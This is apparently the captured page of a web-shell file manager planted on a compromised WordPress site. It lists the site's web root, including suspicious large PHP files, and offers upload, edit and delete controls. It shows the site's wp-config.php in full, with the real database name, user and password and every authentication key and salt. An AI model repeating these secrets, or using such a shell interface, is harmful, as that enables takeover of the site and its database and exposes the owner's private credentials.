File Manager Lite
Dir:
/home/u802038231/domains/abelectricpower.com/public_html
Upload
[..]
.htaccess (440 B)
Edit
Rename
Del
.htaccess.bk (714 B)
Edit
Rename
Del
.private/
Rename
Del
.tmb/
Rename
Del
@LongLink/
Rename
Del
backup.zip (122 B)
Edit
Rename
Del
file.php (1.86 MB)
Edit
Rename
Del
googlec0cc72f61677e79a.html (53 B)
Edit
Rename
Del
home.php (405 B)
Edit
Rename
Del
index.php (591 B)
Edit
Rename
Del
license.txt (19.44 KB)
Edit
Rename
Del
llms.txt (15.18 KB)
Edit
Rename
Del
readme.html (7.25 KB)
Edit
Rename
Del
rlc.txt (1 B)
Edit
Rename
Del
robots.txt (980 B)
Edit
Rename
Del
tmp/
Rename
Del
v2.php (1.18 KB)
Edit
Rename
Del
wp-admin/
Rename
Del
wp-blog-header.php (351 B)
Edit
Rename
Del
wp-comments-post.php (2.27 KB)
Edit
Rename
Del
wp-config.php (3.47 KB)
Edit
Rename
Del
wp-content/
Rename
Del
wp-cron.php (5.49 KB)
Edit
Rename
Del
wp-includes/
Rename
Del
wp-links-opml.php (2.44 KB)
Edit
Rename
Del
wp-links.php (1.46 KB)
Edit
Rename
Del
wp-login.php (50.21 KB)
Edit
Rename
Del
wp-mail.php (8.52 KB)
Edit
Rename
Del
wp-signup.php (33.71 KB)
Edit
Rename
Del
wp-trackback.php (4.98 KB)
Edit
Rename
Del
Edit: wp-config.php
<?php define('WP_CACHE', false ); // Added by AirLift /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'u802038231_ZwLjc' ); /** Database username */ define( 'DB_USER', 'u802038231_85Ufx' ); /** Database password */ define( 'DB_PASSWORD', 'YmEJZQTCOO' ); /** Database hostname */ define( 'DB_HOST', '127.0.0.1' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'c/f<WUq~j880=v9kG^eT,YYz[`eXqYsM.2J~`o,#5h-O$E_%[-XKju5x4{_oOTPA' ); define( 'SECURE_AUTH_KEY', '>Ok!BA4Gi)?@H0zMS]u{H195-oP;S-oX9S}fO<r.8}J])W<#jp~G GuRjS{0:g.{' ); define( 'LOGGED_IN_KEY', 'ao8S5eb5kK6Ra4(2qOOoC|`-{V/X9#K2G-r489GvU44F-?$Ch8*=I4HL2[2RSYxZ' ); define( 'NONCE_KEY', 'A2-p]QPcVlYEL;R~M+AVFb8~rhkZ}.q13wAn00aGTp<pd/1L:s64A}zE*IcaVLcB' ); define( 'AUTH_SALT', 'sCkAxf~sRFLgDU%iMIe&Wo~N(UM~#&e>b7f6PM.!ArUl]{@~;3hd4=#HkRDT<b%/' ); define( 'SECURE_AUTH_SALT', 'YYm2H|L#8;%*m;_t3xYpU{Z=f$k0[UNDuG-/MJs?3_St?__V1aqP620<jzGE6X3X' ); define( 'LOGGED_IN_SALT', 'S[*jvm0jjFv`jXzM.R2U1SU,x3]ndvND>OeKQi{sRwY`!K0`s0ADu,ro.EF;WT<V' ); define( 'NONCE_SALT', 'xlJ`a7<g`z(1..um?3}t0|-cV/6(;O+!@[b3v1_j8qr%C7V3bkArdHV9I /p,>C7' ); define( 'WP_CACHE_KEY_SALT', '9,NuALU]C4:Iq4nF8g8d9pLl.Bn({,8.a:Y0{pH|Kyxp%$&%9iWoeQ!?MSzN59?;' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /* Add any custom values between this line and the "stop editing" line. */ /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } define( 'FS_METHOD', 'direct' ); define( 'COOKIEHASH', '5fb4deec8ca4a74e10a57026ef75c76f' ); define( 'WP_AUTO_UPDATE_CORE', 'minor' ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Simpan